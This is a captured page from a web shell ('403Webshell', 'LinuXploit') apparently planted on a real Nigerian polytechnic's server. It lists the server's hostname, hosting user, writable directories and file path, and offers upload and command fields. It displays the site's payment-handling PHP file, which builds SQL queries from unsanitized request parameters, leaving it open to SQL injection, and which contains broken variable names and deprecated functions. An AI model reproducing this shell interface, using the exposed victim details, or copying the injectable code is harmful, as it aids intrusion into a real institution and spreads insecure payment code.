403Webshell
Server IP : 172.64.80.1  /  Your IP : 108.162.241.66
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs/ace_admin_student/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs/ace_admin_student/pin_vending.php
<div class="leftpanel">
<div class="mbox">
    <div class="mboxhd">Pin Payment</div>
    <div class="mboxcontent1">
        <?php
        $customer_id = isset($_REQUEST['CUSTOMER_ID'])?$_REQUEST['CUSTOMER_ID']:'';
        $fullname = isset($_REQUEST['CUSTOMER_NAME'])?$_REQUEST['CUSTOMER_NAME']:'';
        $reciept_no = isset($_REQUEST['RECEIPT_NO'])?$_REQUEST['RECEIPT_NO']:'';
        $confirmation_code = isset($_REQUEST['PAYMENT_CODE'])?$_REQUEST['PAYMENT_CODE']:'';
        $descr = isset($_REQUEST['TRANS_DESCR'])?$_REQUEST['TRANS_DESCR']:'';
        $bankcode = isset($_REQUEST['BANK_CODE'])?$_REQUEST['BANK_CODE']:'';
        $branchcode = isset($_REQUEST['BRANCH_CODE'])?$_REQUEST['BRANCH_CODE']:'';
        $trans_amount = isset($_REQUEST['TRANS_AMOUNT'])?$_REQUEST['TRANS_AMOUNT']:'';


		if($_SERVER['REMOTE_ADDR']=='63.100.200.195'){
                //'63.100.200.195' To know where request is coming from
                if($customer_id=='' ||  $receipt_no=='' || $confirmation_code=='' || $trans_amount=='')
				{
					echo 'Transaction Status = false 2';
				}				
                else if(!eregi("^[0-9]", $trans_amount)){
                       // echo 'You have entered invalid amount';
					echo 'Transaction Status = false 4';
                }
                else{
                        //Confirm if record already exist                                              
                        echo checkEntry($customer_id, $confirmation_code, $fullname, $receipt_no, $descr, $bankcode, $branchcode, $trans_amount);                       
                }
        }else{
                echo 'Transaction Status = false -1';
        }

        // Table Structure
        /*
                CREATE DATABASE `unilorin_pindb`;
        USE `unilorin_pindb`;

        #
        # Table structure for table pin_data
        #

        CREATE TABLE `pin_data` (
          `Id` int(6) unsigned NOT NULL auto_increment,
          `customer_id` varchar(40) NOT NULL default '',
          `fullname` varchar(70) default NULL,
          `receipt_no` varchar(40) NOT NULL default '',
          `confirm_code` varchar(70) NOT NULL default '',
          `description` varchar(70) default NULL,
          `amount` decimal(15,2) NOT NULL default '0.00',
          `bankcode` varchar(5) default NULL,
          `branchcode` varchar(5) default NULL,
          `status` char(1) default NULL,
          PRIMARY KEY  (`Id`),
          UNIQUE KEY `idx_matric` (`customer_id`),
          UNIQUE KEY `idx_confirmcode` (`confirm_code`)
        ) TYPE=MyISAM;

        */
        function checkEntry($customer_id, $confirm_code, $fullname, $receipt_no, $descr, $bankcode, $branchcode, $trans_amount){
                $count = 0;
                $status = '0';
                $sql = "select fullname from pin_data where customer_id='$customer_id' and confirm_code='$confirm_code'";
                //echo $sql;
                $result = mysql_query($sql);
                if($result){
					$row = mysql_fetch_array($result);
					$count = mysql_num_rows($result);
                }
                if($count>0){
                        // Record already exist
                        return 'Transaction Status = false 1';
                }else{
                        ////$insert_sql = sprintf("insert into pin_data(customer_id, receipt_no, confirm_code, amount) values (%s, %s, %s, %s)",
                        $insert_sql = "insert into pin_data(customer_id,fullname,receipt_no,confirm_code,description,amount,bankcode,branchcode,status) values ('$customer_id','$fullname','$receipt_no','$confirm_code','$descr',$trans_amount,'$bankcode','$branchcode','0')";
						////GetValueString($customer_id, "text"),
                        ////GetValueString($reciept_no, "text"),
                        ////GetValueString($confirm_code, "text"),
                        ////GetValueString($trans_amount, "double"));
                        //echo $insert_sql;
                        ////$result = mysql_query($insert_sql) or die (mysql_error());
						$result = mysql_query($insert_sql);
                        //echo mysql_affected_rows();
                        if(mysql_affected_rows() > 0){
							return 'Transaction Status = true';
						}
					}
        }
        ?>
    </div>
</div>
</div>
<div class="rightpanel">
    <div class="mbox">
        <div class="mboxcontent2"><p align="center">Pin payment is a very simple payment system that enables payments to be
            made from the bank</p><br><br>
            <a href="pin_payment.php?pin_aux=test">Test Payment</a>
        </div>
    </div>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit